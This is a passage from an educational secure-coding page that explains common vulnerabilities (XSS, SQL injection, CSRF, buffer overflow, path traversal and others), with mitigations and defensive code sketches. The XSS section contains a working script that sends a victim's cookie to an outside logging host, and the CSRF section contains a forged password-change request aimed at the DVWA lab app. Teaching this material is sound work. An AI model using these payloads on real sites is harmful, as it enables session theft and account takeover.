Vulnerability of the Day


Vulnerability of the Day is an open source project started by Prof. Meneely and is in use by several universities. Check us out on GitHub – pull-requests welcome!


Integer Overflow

Description

  • CWE-190: Integer Overflow or Wraparound
  • CWE-680: Integer Overflow to Buffer Overflow

Examples

Mitigations

  • Check the size of your integers, considering what would happen if it wrapped around.
  • Watch the casting – don’t just ignore those compiler warnings!
  • Libraries such as SafeInt or BigInteger might be more suitable if the problem is very complex.
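
The pre-allocation check described above can be sketched in Python. Python integers never wrap, so 32-bit unsigned arithmetic is simulated with a mask here; the function names are illustrative, not a real API:

```python
# Sketch: the check-before-malloc idea, simulated with 32-bit unsigned
# arithmetic (Python ints never wrap, so we mask to imitate C).
UINT32_MAX = 0xFFFFFFFF

def u32_mul(a, b):
    """What a 32-bit C multiplication actually computes: it wraps silently."""
    return (a * b) & UINT32_MAX

def checked_alloc_size(count, element_size):
    """Refuse allocation sizes that would wrap around."""
    if element_size != 0 and count > UINT32_MAX // element_size:
        raise OverflowError("allocation size would wrap around")
    return count * element_size

# 1073741824 * 4 wraps to 0 in 32 bits -> malloc would return a
# zero-sized buffer, which any write then overflows.
```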

Notes

  • A wraparound combined with a malloc operation can result in a zero-sized buffer being allocated – and a zero-byte buffer will always be overflowed by any write to it.
  • In practice, most integer wraparounds come from improper casting, not as much from mathematical operations.
  • It’s impractical to always check every integer for wraparound after every operation, but keep this as a consideration in sensitive situations.
  • Trivia: Psy YouTube; Deep Impact
  • Comic: XKCD-571

Buffer Overflow

Description

Examples

Mitigations

  • Keep track of your array sizes.
  • Check the size of your buffer as input is read. For example, if you use scanf the format string can specify a maximum length, such as %3s instead of %s.
  • In the case of C, use functions like strncpy() instead of strcpy() that force you to specify lengths (but beware: strncpy() does not null-terminate on truncation).
  • Avoid functions like gets() that don’t check the input size.

Notes

  • Buffer overflows have been very common for a long time.
  • If you are clever enough, you can overwrite the return address on the stack frame so that your own code is then executed.
  • Languages that enforce array lengths are not susceptible to this classic form (e.g. Java).
  • Merely turning on the stack protector is not enough. We could easily craft an exploit that stays within the stack frame. (In our example, turning on the stack protector doesn’t fix the “Gotcha!” exploit.)
  • Comic: XKCD-1354 – the infamous Heartbleed vulnerability in OpenSSL leveraged a buffer over-read to expose arbitrary data from memory.

SQL Injection

Description

Examples

Mitigations

  • The only acceptable mitigation is properly-used prepared statements (with bind variables). These API calls are supported by all SQL standards and separate the logic of the query from its input entirely (i.e. the SQL is pre-compiled). No string concatenation should be used. Key: never allow any possibility for user input to turn into executable code.
  • Escaping characters has proven to be a poor substitute, as changing character sets makes this a moving target and quite difficult.
  • Using an OO-relational mapper (e.g. Hibernate) can mitigate this. However, string concatenation on the Hibernate query language can result in basically the same thing.
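
A minimal sketch of the prepared-statement mitigation, using Python's built-in sqlite3 module (the table and data here are invented for illustration). The `?` placeholders bind user input as pure data, so it can never become part of the SQL logic:

```python
import sqlite3

def find_user(conn, username):
    # BAD:  conn.execute("SELECT * FROM users WHERE name = '" + username + "'")
    # GOOD: the query logic is fixed; the input is bound separately.
    cur = conn.execute("SELECT id, name FROM users WHERE name = ?", (username,))
    return cur.fetchall()

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'alice')")

# The classic injection string is now just an odd (non-matching) username:
find_user(conn, "' OR '1'='1")   # returns [] -- no user has that literal name
```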

Notes

  • Ranked #6 on the CWE Top 25 vulnerabilities for 2020. Very common today.
  • Can be done in pretty much all languages that can execute SQL: Java, Ruby, PHP, etc.
  • Not particularly hard to find or fix, you just have to know about it.
  • A lot of people will tell you that you need lots of tools to fix SQL injection. It’s all snake oil – just use prepared statements.
  • Ars Technica has a very nice writeup on the history and consequences of SQL injection.
  • Comic: XKCD-327

Cross-Site Scripting (XSS)

Description

  • CWE-79: Cross-Site Scripting

Examples

  • Use DVWA (see XAMPP installation as described in the web applications activity).

Mitigations

  • Defense in depth: Perform thorough input validation. Accept only “known good” input; use a whitelist of acceptable inputs.
  • Converting HTML characters to their escaped form (e.g. < to &lt;) is the safest approach. Restricting input is a good idea, but sometimes certain characters need to be allowed, and escaping provides that flexibility.
  • However! Knowing which characters to escape is very tricky. I strongly recommend using an external library, and not just rolling your own. Check out how complicated it is at OWASP’s XSS Cheat Sheet.
  • Use a library for handling this kind of thing. Understand how this library works (is it regexes, parsing to HTML, etc?). Follow the problems this library has fixed. A great example of a library that mitigates XSS for Ruby on Rails is the sanitize gem.
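
As a sketch of the escaping approach, Python's standard library provides html.escape, which converts <, >, &, and quotes before untrusted text is written into a page (the render_comment wrapper is illustrative):

```python
import html

def render_comment(user_text):
    # Escape untrusted input before it lands inside HTML.
    return "<p>" + html.escape(user_text, quote=True) + "</p>"

render_comment("<script>alert(1)</script>")
# -> '<p>&lt;script&gt;alert(1)&lt;/script&gt;</p>'
```

This neutralizes the basic cases; as the bullets above note, full XSS defense (attributes, URLs, CSS contexts) needs a real sanitization library.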

Notes

  • Widely considered among the most dangerous vulnerabilities today. XSS vulnerabilities have affected GMail, Twitter, Facebook, Hotmail, Yahoo Mail, and just about every other major web application out there.

  • Executing Javascript on another person’s machine can result in a vast number of exploits. In every case, the asset of cross-site scripting is the user interface. The two main exploits of XSS are:

    • session hijacking, where you steal the authentication token from the victim’s cookie and use it to log in. For example:
      <script>
      x = new XMLHttpRequest();
      x.open("GET", "http://requestb.in/13x2ec31?s=" + document.cookie, true);
      x.send();
      </script>
      

      This is a silent AJAX call to a remote site, which an attacker then monitors anonymously, stealing your authentication token. Having the authentication token gives the attacker the ability to log in as the victim (as long as they stay logged in). From there, the attacker can reset passwords, set up other accounts, set up permanent scripts – anything.

    • web defacement, where you can modify the page to have an extra form asking for someone’s password, which gets sent off to a remote site. A user would not be able to tell that they just sent their password to a malicious site.
  • A good discussion of XSS, including some fascinating historical exploits, is on the Ruby on Rails security page.

  • Note that XSS does not always have to be done inside <script> tags – it can be done via CSS injection, inside image metadata, and in many other situations. There’s even DOM-based XSS, with its own massive cheat sheet.

  • Try this exploit on the XSS Reflected page in DVWA. ;)

    <canvas id=c><script>C=c.getContext('2d');f=C.fillRect.bind(C);
    S=[-1,I=J=0];A=B=210;X=Y=1;
    function g(n){++S[n];N=Math.random(M=n*613+9)*471}D=document;
    D.onkeydown=D.onkeyup=function(e){d=!!e.type[5];k=e.keyCode;
    k&1?I=k&16?d:-d:J=k&4?-d:d};
    g(0);setInterval(function(){A-=A<I|A>420+I?0:I;
    B-=B<J|B>420+J?0:J;
    M+=X;N+=Y;
    N<0|N>471?Y=-Y:0;
    M==622&N>B&N<B+51|M==9&N>A&N<A+51?X=-X:M>630?g(0):M||g(1);
    f(0,0,c.width=640,c.height=480);
    C.fillStyle='tan';C.font='4em x';C.fillText(S,280,60);
    f(0,A,9,60);f(631,B,9,60);f(M,N,9,9)},6)</script>
    </canvas>
    

Cross-Site Request Forgery (CSRF)

Description

  • CWE-352: Cross-Site Request Forgery
  • Another good description.
  • Essentially, when an HTTP GET request makes a persistent modification, an attacker can get users to make changes to other websites they are already authenticated to.

Examples

  • Use DVWA (see XAMPP installation as described in the web applications activity).
  • An example exploit would be getting a user to load an HTML page with this image:
    <img src="http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=12345&password_conf=12345&Change=Change#">
    

Mitigations

  • As a rule, don’t allow GET actions to perform persistent modifications to the website.
  • If a GET does still need to make a modification, then require authentication within that HTTP request (see DVWA as an example).
  • Session tokens should not be allowed in URLs, only in cookies.
  • Many web application frameworks (e.g. Rails) will produce a CSRF token with forms. These are random numbers that the server provides with each presented form, and expects back before processing any POST request. However, these can be circumvented when other situations such as XSS are possible.
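
The per-session token scheme from the last bullet can be sketched framework-free in Python; the session dict and function names are illustrative, not any particular framework's API:

```python
import hmac
import secrets

def issue_csrf_token(session):
    token = secrets.token_hex(32)     # unguessable random value
    session["csrf_token"] = token     # remembered server-side
    return token                      # embedded in a hidden form field

def verify_csrf_token(session, submitted):
    expected = session.get("csrf_token")
    if not expected:
        return False                  # no token issued -> reject
    # constant-time comparison avoids leaking the token via timing
    return hmac.compare_digest(expected, submitted)

session = {}
t = issue_csrf_token(session)
verify_csrf_token(session, t)         # True: genuine form submission
verify_csrf_token(session, "forged")  # False: a cross-site request lacks the token
```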

Notes

  • Technically, this is not cross-site scripting, as no script is being executed in the user’s browser. However, CSRF allows attackers to fool victims into sending authenticated requests that modify something in the app itself.
  • CSRF is one reason that many email clients don’t show images upon initially showing an email.

OS Command Injection

Description

  • CWE-78: OS Command Injection

Examples

Mitigations

  • Generally speaking, be very careful with using these generic “run in the OS” calls. Avoid, if possible. Usually, APIs exist for specific OS calls that can accomplish the same thing without the danger of injection.
  • Many languages allow executing a single command with an explicit argument list (rather than passing a whole string through a shell), which can limit the injection.
  • Only allow certain input to these commands, as opposed to blocking or escaping bad input.
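
The argument-list approach can be sketched with Python's subprocess module (assuming a Unix system with grep available; the search wrapper is illustrative). Because no shell is involved, user input can never be reinterpreted as shell syntax:

```python
import subprocess

def search(pattern, text):
    # BAD:  subprocess.run("grep " + pattern, shell=True, input=text, ...)
    # GOOD: each argument is handed to the program as-is, no shell parsing.
    result = subprocess.run(["grep", "--", pattern],
                            input=text, capture_output=True, text=True)
    return result.stdout

# A hostile "pattern" like "x; rm -rf /" is now just a literal search string.
```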

Notes

  • Web application technologies like PHP and Ruby on Rails make these OS calls very easy these days. These are very dangerous, as getting access to the underlying web server can have a huge impact.
  • It’s tempting to think you can just use a quick grep function or call a separate script, but be sure to think twice about that interaction.

Path Traversal

Description

Examples

  • Demo: path-traversal.zip.
  • CVE-2009-2902. An issue in Tomcat where they allowed web applications to be named ...war, which could be used for arbitrary file deletion outside of the webapp sandbox.

Mitigations

  • Remember that path strings are very flexible – they can be relative or absolute. So a/b/c.txt is the same as a/b/../b/c.txt. The canonical form of any file is just the absolute path name, e.g. /home/someone/a.txt.
  • Better to leave the canonicalization to the programming language. Java has getCanonicalPath(); in C, PHP, and Perl it’s called realpath(). These actually ping the filesystem to interpret the path string.
  • Tactic: canonicalize your sandboxed directory, canonicalize the final filename you are about to open, and compare the two with startsWith.
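
The canonicalize-and-compare tactic looks like this in Python, using os.path.realpath (Python's equivalent of realpath()/getCanonicalPath()); the sandbox path and function name are illustrative:

```python
import os

def safe_path(sandbox, filename):
    sandbox_real = os.path.realpath(sandbox)
    target = os.path.realpath(os.path.join(sandbox, filename))
    # The os.sep suffix stops "/sandbox-evil" from passing a "/sandbox" check.
    if not target.startswith(sandbox_real + os.sep):
        raise PermissionError("path escapes the sandbox: " + filename)
    return target

# safe_path("/srv/app", "notes.txt")        -> "/srv/app/notes.txt"
# safe_path("/srv/app", "../../etc/passwd") -> PermissionError
```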

Notes

  • Another one that’s common to web applications especially. This often appears in PHP apps that delegate code to the operating system, or use flat file storage.
  • Akin to SQL Injection where it’s string concatenation gone wrong. Sadly, there’s no version of a prepared statement for files (e.g. set the directory separately from the file name), so new File(sandbox, filename) is still vulnerable to this.
  • The myriad of exploits for this one over the years has shown that blacklisting is not a good approach. Better to just convert to absolute, and check the directory from there.
  • Can also be a danger with configuration files. In the interest of defense in depth, it might be wise to do this kind of check when a properties file contains the name of another file.
  • Trivia: Using .. in URL directory indexing to access any file on the webserver is called “slash-dotting”, which is why the news site slashdot.org is called slashdot.org.

Log Overflow

Description

  • Log overflow vulnerabilities fall under CWE-400: Uncontrolled Resource Consumption.
  • CWE-779 and CWE-770 are also related.
  • Printing out to a console or logger usually ends up in a text file. If an attacker knows this, and the logging is unrestricted, then attackers can crash the machine by filling up the hard drive with log entries. This is a denial of service attack that is particularly difficult to recover from. Plus, weird things happen when the hard drive is completely full, and attackers can take advantage of that too.

Examples

  • Demo: log-overflow.zip.
  • CVE-2013-0231. A driver was flooding the Linux kernel with messages, which got logged and filled up the hard drive. The fix was to limit the rate at which the driver could print errors.

Mitigations

  • Use a logging library (e.g. log4j). In configuring your logger, be sure to use rolling log files. These can be rotated on a daily basis, or by size.
  • Be sure to actually test this functionality yourself.
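
A rolling-log configuration can be sketched with Python's standard logging module (the sizes here are tiny just to show rotation; real deployments would use megabytes). Once a file hits maxBytes it rotates, and only backupCount old files are kept, so total disk usage stays bounded no matter how hard an attacker floods:

```python
import logging
import logging.handlers
import os
import tempfile

logdir = tempfile.mkdtemp()
handler = logging.handlers.RotatingFileHandler(
    os.path.join(logdir, "app.log"),
    maxBytes=1024,    # rotate after ~1 KB
    backupCount=3,    # keep at most app.log plus 3 old files
)
log = logging.getLogger("demo")
log.addHandler(handler)
log.setLevel(logging.INFO)

for i in range(1000):  # simulate an attacker-style flood
    log.info("request %d from untrusted client", i)

# However much is logged, only 4 small files survive on disk.
```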

Notes

  • Mostly an issue in applications that run on servers, although desktop clients are not immune to this.
  • The disadvantage of this mitigation is that you can potentially lose your logs if they get over-rotated. Attackers can potentially take advantage of this fact by intentionally overflowing the logs to erase the evidence. But other protections, like request limits, can mitigate that problem too.
  • As a general rule, avoid unlimited hard drive storage (e.g. uploading photos). Sometimes it’s easier to just store images as BLOBS in a database (where the table sizes are often limited by default), as opposed to dealing with the OS directly.

XML Embedded DTDs

Description

  • See CWE-827 for the general case, and then the specific vulnerabilities are CWE-776 and CWE-611.
  • XML allows for validation of its input using Document Type Definitions (DTDs). These DTDs are pretty flexible, and allow for things like reading in external files. However, users can embed their own DTDs in the header of an XML file, thereby accessing the file system directly.

Examples

Mitigations

  • In most languages, you can disable validation of embedded DTDs with ease.
  • However, make sure you test this closely, as Java’s built-in SAX parser does not always respect setValidating(false) and setExpandEntityReferences(false) depending on the environment. In that case, you need to override the entity resolver (see the given example).
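
In Python, for example, external general entities can be explicitly disabled on the standard SAX parser (the handler class below is illustrative; note that recent Python versions already refuse to fetch external entities by default, so this is belt-and-braces):

```python
import io
import xml.sax
import xml.sax.handler

class TextCollector(xml.sax.handler.ContentHandler):
    def __init__(self):
        super().__init__()
        self.text = []
    def characters(self, data):
        self.text.append(data)

def parse_untrusted(xml_bytes):
    parser = xml.sax.make_parser()
    # Refuse to fetch external entities declared in an embedded DTD.
    parser.setFeature(xml.sax.handler.feature_external_ges, False)
    collector = TextCollector()
    parser.setContentHandler(collector)
    try:
        parser.parse(io.BytesIO(xml_bytes))
    except xml.sax.SAXException:
        return ""   # parser rejected the document outright; also fine
    return "".join(collector.text)

evil = (b'<?xml version="1.0"?>'
        b'<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
        b'<r>&xxe;</r>')
parse_untrusted(evil)   # either way, /etc/passwd never reaches the application
```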

Notes

  • Ironically, DTDs were originally intended for XML validation, but it got warped into more of a user convenience. So yes, fixing this vulnerability means turning off “validation”.
  • A similar vulnerability is the XML bomb, which expands XML entities exponentially (causing a DoS by filling up the memory). However, most XML parsers have limiting defaults for expanding XML entities, so that XML bombs are (practically speaking) no longer an issue as long as developers don’t explicitly turn off the limits. An example XML bomb is included in the above zip.

Hardcoded Credentials

Description

  • CWE-798: Use of Hard-Coded Credentials

Examples

  • Demo: hardcoded-credentials.zip.
  • 2016 Uber Data Breach – an Uber developer accidentally pushed hardcoded Amazon AWS credentials to GitHub, allowing hackers to gain access to names, emails, and phone numbers for 57 million users and 600,000 driver’s license images.

Mitigations

  • Extract your credentials out to a properties file, then install your system with the proper permissions on that properties file.
  • Corollary: don’t include default passwords at all – make the user define them upon installation.
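
The properties-file approach can be sketched with Python's configparser (the file path, section, and key names are illustrative). The code ships with no secrets; they live in a file the installer creates with restrictive permissions:

```python
import configparser
import io

def load_db_credentials(fileobj):
    cfg = configparser.ConfigParser()
    cfg.read_file(fileobj)
    return cfg["database"]["user"], cfg["database"]["password"]

# In deployment this would be e.g. open("/etc/myapp/db.properties"),
# a file owned by the service account with mode 0600.
example = io.StringIO("[database]\nuser = app\npassword = s3cret\n")
load_db_credentials(example)   # -> ("app", "s3cret")
```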

Notes

  • Believe it or not, this is another common problem. It’s a common misconception that you can keep secrets in your source code.
  • Same kind of concept applies to encryption keys, or pseudo-random number generator seeds.
  • Obfuscation isn’t the answer because reverse engineering is easier than you think. (Takes time and some skill, which crowds have).
  • License keys have had this problem. Many companies today resort to a remote authentication for license products. But even then, it’s still a tough problem today for desktop client applications (e.g. Windows Genuine Advantage).
  • Hardcoding credentials also breaks maintainability and deployability. What if your database password was guessed, and you had to change it?
  • Don’t push your Slack token to GitHub!

Time of Check, Time of Use (TOCTOU)

Description

Examples

  • The L1 Terminal Fault vulnerability involved TOCTOU and allowed attackers to leak data across hyperthreads.
  • PHP had a TOCTOU vulnerability related to their shutdown function and memory_limit functionality in CVE-2004-0594. See the fix for better details.
  • This has also occurred in installation scripts, such as Debian’s checkinstall in CVE-2008-2958. See the original bug report.

Mitigations

  • When possible, try to make transactions as atomic as possible. If the technology provides a way to check and change in a single transaction, do it. But this is not always possible.
  • To make exploits harder, minimize the time between checking and using.
  • Limit the number of processes that can access a single file (or other resource without much concurrency checking).
  • Recheck the resource for integrity after using it.
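
A sketch of the "minimize the check/use gap" idea in Python (Unix assumed; the function name is illustrative): instead of checking a path and then opening it – two steps an attacker can race – open first, then inspect the already-open descriptor with os.fstat, so the check and the use refer to the very same file:

```python
import os
import stat
import tempfile

def open_regular_file(path):
    # O_NOFOLLOW (where available) refuses symlinks outright.
    fd = os.open(path, os.O_RDONLY | getattr(os, "O_NOFOLLOW", 0))
    info = os.fstat(fd)              # inspects the file we actually opened
    if not stat.S_ISREG(info.st_mode):
        os.close(fd)
        raise OSError(path + " is not a regular file")
    return os.fdopen(fd, "rb")

# demo: a throwaway regular file
tmp = tempfile.NamedTemporaryFile(delete=False)
tmp.write(b"data")
tmp.close()
f = open_regular_file(tmp.name)
```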

Notes

  • Sometimes this cannot ever be fully mitigated, depending on the technology and situation.
  • This vulnerability is typically a concurrency issue, so all of the best design practices of concurrency apply here.

Lack of Log Neutralization

Description

  • CWE-117: Improper Output Neutralization for Logs
  • If you allow newlines in your logs, then attackers can forge log entries, throwing investigations off.
  • Related to generalized CRLF Injection CWE-93.

Examples

Mitigations

  • Don’t allow newlines in your logs - remove them entirely.
  • Depending on what tools are used to analyze logs, removing the CRLF characters might not be enough. Consider neutralizing <br> too if logs can be viewed in a browser.
  • Don’t forget to log the situation where a newline is injected, too.
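
A minimal neutralizer following the three bullets above (the function name and the flag text are illustrative):

```python
def neutralize(value):
    # Strip CR/LF so a single user value cannot span multiple log lines.
    cleaned = value.replace("\r", "").replace("\n", "")
    if cleaned != value:
        # Per the last bullet: the injection attempt is itself worth logging.
        cleaned += " [newline(s) removed]"
    return cleaned

neutralize("alice")                            # unchanged
neutralize("alice\nINFO: admin logged out")    # one line, and flagged
```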

Notes

  • This is one vulnerability that is explicitly a repudiation threat.
  • By itself, this is pretty innocuous. In conjunction with other attacks, an attacker can provide misinformation in the logs that throws off the post-exploit investigation.
  • Attackers who have access to previous logs (or similar logs) can easily guess or reverse-engineer your log formats, making forged entries indistinguishable. Take a look at CAPEC attack pattern 93.
  • Oddly enough, common logging libraries like java.util.logging and log4j don’t have an option to remove newlines.

Hashing Without Salt

Description

  • CWE-759: Use of a One-Way Hash without a Salt
  • If an attacker breaks into a system that provides authentication, they should not be able to access the passwords. Historically, people would use hash (digest) algorithms to accomplish this. However, commonly-guessed passwords are still vulnerable, as attackers can build “rainbow tables” – precomputed digests of common passwords.

Examples

  • Demo: hashing-salt.zip – The given example is an authentication example that demonstrates the different ways you can store a password and still authenticate. User sets their password, which gets salted and then digested (hashed). Every time the user authenticates, the system then salts and digests the password, and checks the results.

Mitigations

  • Append a secret “salt” string that only the server knows before digesting. This will make those digests unrecognizable.
  • Make sure that the salt is set by the final user upon installation, not hardcoded or shipped as a default. A server salt is like default passwords or PRNG seeds – a secret that users should set themselves.
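
The salt-then-digest-then-compare flow can be sketched with the standard library. This variant uses a per-password random salt stored next to the digest (a common alternative to a single server-wide salt), and PBKDF2 rather than a single fast hash so brute force is also slowed down:

```python
import hashlib
import hmac
import os

def set_password(password):
    salt = os.urandom(16)   # random salt, stored alongside the digest
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest     # neither value reveals the password

def check_password(password, salt, digest):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return hmac.compare_digest(candidate, digest)

salt, digest = set_password("correct horse battery staple")
check_password("correct horse battery staple", salt, digest)  # True
check_password("hunter2", salt, digest)                       # False
```

Because every password gets its own salt, identical passwords produce different digests, which is exactly what defeats precomputed rainbow tables.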

Notes

  • Don’t ever store passwords in plain text. This means that your “reset password” feature should never email passwords in plaintext (because you don’t have them anymore!). If you ever notice a website that does this, they are not hashing their passwords.
  • Don’t make your salt easily guessable. Any long string is fine, since you won’t need to remember it again.

Insecure PRNG Algorithms

Description

  • CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)
  • Most pseudo-random number generators (PRNGs) are not designed to be secure, and with improper management can be easily guessed by a variety of methods.

Mitigations

  • Use PRNGs that are designed to be secure, e.g. java.security.SecureRandom instead of java.util.Random.
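
The same split exists in Python: random.Random is fully determined by its seed, while the secrets module draws from the operating system's CSPRNG. A quick sketch of the difference:

```python
import random
import secrets

# Two insecure generators with the same seed produce identical "random" streams:
a = random.Random(1234)
b = random.Random(1234)
[a.randrange(100) for _ in range(5)] == [b.randrange(100) for _ in range(5)]  # True

# For tokens, keys, session IDs, etc., use a generator designed to be
# unpredictable:
token = secrets.token_hex(16)   # 32 hex characters from the OS CSPRNG
```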

Notes

  • Insecure PRNGs are typically faster than secure ones.
  • Reproducibility is favorable in some non-security applications, e.g. research simulations, procedurally-generated game states.

Poor/Lack of PRNG Seed Protection

Description

  • CWE-337: Predictable Seed in PRNG
  • If you are using PRNGs for security purposes (e.g. encryption keys, session tokens, unique tokens), don’t make those seeds easily guessable.

Examples

  • Demo: prng.zip – DeckDealer is a simplified example of a card shuffling class where the PRNG was seeded by the time, and an outside program could just create a database of possible seeds and check the results.
  • A famous example of this occurred in Debian distributions of OpenSSL, as described in depth here.

Mitigations

  • Don’t use predictable seeds, such as:
    • Seeds that are reset consistently. Re-seeding doesn’t make the PRNG any more secure (or “random”).
    • Millisecond time. In 100 years, there are only 3*10^12 milliseconds, which a botnet can easily enumerate through.
    • Nanosecond time. If attackers know roughly when you reset your seed, they can narrow down the space for guessing.
    • Process IDs. Even smaller space than millisecond time.
    • Anything else that can be guessed.
  • Instead, have the user set a secret token upon installation, and protect that secret token. Consider that token to be an asset, much like the salt for hashes.
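
The DeckDealer-style attack from the example above can be sketched in a few lines: if the seed is something small like a second-resolution timestamp, an attacker who observes a little output can simply enumerate every candidate seed (the "server" and "attacker" functions and the timestamp values below are all invented for illustration):

```python
import random

def observed_output(seed):
    """The 'server': seeds a PRNG with a timestamp and emits three numbers."""
    rng = random.Random(seed)
    return [rng.randrange(1000) for _ in range(3)]

def recover_seed(output, t_start, t_end):
    """The 'attacker': try every plausible timestamp until one matches."""
    for guess in range(t_start, t_end):
        if observed_output(guess) == output:
            return guess
    return None

secret_seed = 1_600_000_123            # e.g. int(time.time()) on the server
leak = observed_output(secret_seed)
recover_seed(leak, 1_600_000_000, 1_600_001_000)
# finds a seed reproducing the leak -- in practice, the server's actual seed
```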

Notes

  • The need for secure PRNGs arises in many different situations, such as cryptographic seeds, multi-factor authentication mechanisms, and session tokens. In most cases, a broken PRNG has devastating effects (e.g. predicting all future session tokens).
  • This is a different vulnerability than Insecure PRNG Algorithms. You need to mitigate both of these problems. Specifically:
    • What if I had an insecure algorithm, and an unprotected seed? BAD. You are vulnerable two different ways - people can reverse-engineer your seed, and just steal the seed.
    • What if I had an insecure algorithm, but a protected seed? BAD. Attackers can use math to reverse engineer the seed, or the next number. It’s harder to do, but when they get the seed it’ll be as if they stole it.
    • What if I had a secure algorithm, but an unprotected seed? BAD. Secure PRNGs still need seeds, and the algorithm does nothing to protect the seed for you. They are still deterministic – after all, they are still pseudo-random.
    • What if I had a secure algorithm, and a protected seed? GOOD. This is the ideal situation, regarding these two vulnerabilities. (You might be vulnerable other ways, of course. Say, to side-channel attacks.)

Java Reflection Abuse

Description

  • CWE-470: Unsafe Reflection
  • Despite what you might assume, Java allows you to access private variables in other classes via its Reflection API. In untrusted API situations (e.g. plug-in architectures), this can lead to malicious libraries accessing and tampering with sensitive data.

Examples

  • Demo: reflection-abuse.zip – Running make results in the exploit; make safe runs it under a security manager.
  • The ColdFusion database access API has this vulnerability (CVE-2004-2331).

Mitigations

  • Use the Java Security Manager to limit privileged API situations. While this feature is turned off by default, it’s actually critical for deploying a Java application securely (e.g. in a servlet container).

Notes

  • Many Java servers (e.g. Tomcat) support a strict security policy; however, many default installations of such servers do not force you to set up your security policy with the Java virtual machine.
  • The Java security manager blocks all kinds of other sensitive actions, such as System.exit(1);, file system access, or using reflection to instantiate singletons.
  • The Deployment & Distribution lecture covers more details on the Java Security Manager.
  • PHP also allows this kind of behavior, and third-party security manager libraries provide similar functionality as the Java Security Manager.

Cache Poisoning

Description

Examples

  • A very famous vulnerability (CVE-2008-1447) in BIND, a DNS server that runs at the heart of the internet, was a cache poisoning vulnerability that went undiscovered for decades until it was found and actively exploited in 2008. DNS maps names to IP addresses and uses a complex, multi-tiered form of caching throughout the internet’s root nodes. Attackers were able to cause certain domain names (Yahoo was one of them) to map to malicious IP addresses for some users, depending on their nearest DNS host.
  • A similar vulnerability in dnscache (CVE-2008-4392) attacked the “Start of Authority” requests. The reports show some relatively simple patches (this and this) that essentially do input validation and handle the boundary cases better.

Mitigations

  • If possible, don’t allow users to set their own cache expiration dates.
  • If possible, don’t allow users much control over caches to begin with.
  • As always, input validation helps, but it should not comprise the whole solution.
  • If you implement your own cache, be sure to put some extra checks in place for expiration dates and purging policies. Build the feature so that the expiration date is not set by the user, or at the very least validated to a specific range. If it’s worth the performance hit, periodically purge the cache regardless of expiration dates.
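
The expiration-clamping advice can be sketched as a tiny cache class (entirely illustrative names and policy values): the cache accepts a caller-suggested TTL but never lets it exceed a server-side maximum, so a poisoned entry cannot be made to live forever:

```python
import time

class ClampedCache:
    MAX_TTL = 300                     # server policy, never user-settable

    def __init__(self):
        self._store = {}

    def put(self, key, value, ttl):
        ttl = min(ttl, self.MAX_TTL)  # clamp whatever the caller asked for
        self._store[key] = (value, time.time() + ttl)

    def get(self, key):
        value, expires = self._store.get(key, (None, 0))
        return value if time.time() < expires else None

cache = ClampedCache()
# An attacker asks for a "forever" entry; it still expires within MAX_TTL.
cache.put("dns:example.com", "93.184.216.34", ttl=10**9)
```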

Notes

  • If your system’s assets are cached, then your cache becomes an asset. Consider this possibility in your risk analysis and planning for new features.
  • Historically, cache poisoning has most often applied to networking situations. The concept, however, is not specific to networking.
  • Cache poisoning can also occur in web applications if the attacker can set HTTP headers. In particular, setting HTTP headers like Last-Modified can fool both the victim’s browser cache and server-side caches (e.g. Squid) into keeping exploits like XSS and CSRF cached for multiple requests. To mitigate this, never allow user data to be used in HTTP response headers.
  • In the security community, this is often considered more of an attack than a vulnerability, as often the mistake is not in the cache itself, it’s in the surrounding systems that employ the cache.

Uncontrolled Format String

Description

  • CWE-134: Use of Externally-Controlled Format String
  • In C, printing using printf(str) instead of printf("%s", str) results in the user being able to control the format string. This is especially egregious when you look at the %x and %n codes, which allow users to read and write arbitrary bytes at arbitrary memory locations.

Examples

  • Demo: format-string.zip – Run make to see some interesting exploits. Also, be sure to check out what read-memory.rb does (requires make first).

Mitigations

  • Just use a format string!
  • Watch your compiler warnings, which look like: warning: format not a string literal and no format arguments.
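
An analogous bug exists outside of C: in Python, passing untrusted input to str.format lets the attacker follow attribute references and leak internal state, much like %x walks the stack. A sketch (the Config class and function names are invented for illustration):

```python
class Config:
    def __init__(self):
        self._secret = "hunter2"

def greet_unsafe(user_template, cfg):
    # BAD: the user's string is interpreted as a format string.
    return user_template.format(cfg=cfg)

def greet_safe(name):
    # GOOD: user input is only ever substituted as data.
    return "Hello, {}!".format(name)

cfg = Config()
greet_unsafe("{cfg._secret}", cfg)   # leaks 'hunter2' -- the %x of Python
greet_safe("{cfg._secret}")          # just echoes the braces back as text
```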

Notes

  • The key that makes the %x code work is that printf is a “varargs” function. If you add more %x codes to the string, printf just starts reading memory locations from where it left off – right at the call stack.
  • This one is just as severe as buffer overflow, as it can allow arbitrary remote code execution.
  • Entire books have been written on elaborate exploits of format string vulnerabilities.

Compression Bombs

Description

  • CWE-409: Improper Handling of Highly Compressed Data
  • A great discussion from libpng.
  • Similar to an XML bomb, compression bombs are primarily used for denial of service attacks by filling up RAM or hard disk space. Minimally, this crashes the process and causes denial of service. Crashes, if handled poorly, however, can also cause other integrity problems (e.g. data corruption), or confidentiality problems (e.g. core dumps).
  • What is more challenging about compression bombs is how ubiquitous compression is, and how hard this is to validate. If you are doing input validation, then you probably need to decompress first, so your decompression library is on the front lines of your attack surface.

Examples

Mitigations

  • Technically, a decompression library can mitigate this problem by keeping count of how many bytes have been decompressed and throwing an exception when a configured limit is exceeded (as is the mitigation with XML bombs). In practice, this feature often does not exist in decompression libraries (sadly). Look for such limits in the libraries that you use.
  • Avoid inputs where an arbitrary number of rounds of compression are allowed (e.g. this is possible with HTTP Headers).
  • Distrustful decomposition + strict system resource limits can mitigate this too. For example, a PNG file that gets server-side processing might want to do that processing in a separate process with tight memory consumption constraints. This adds complexity to your design too, and introduces concurrency complexities.
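
One library that does support byte-counting is Python's zlib: the max_length parameter stops decompression at a cap instead of filling RAM. A sketch (the wrapper name and the 10 MB default are illustrative):

```python
import zlib

def safe_decompress(data, limit=10 * 1024 * 1024):
    d = zlib.decompressobj()
    out = d.decompress(data, limit)   # emit at most `limit` bytes
    if d.unconsumed_tail:             # input remains -> output exceeded limit
        raise ValueError("decompressed size exceeds limit")
    return out

# 16 MB of zeros compresses to a few tens of KB -- a miniature bomb:
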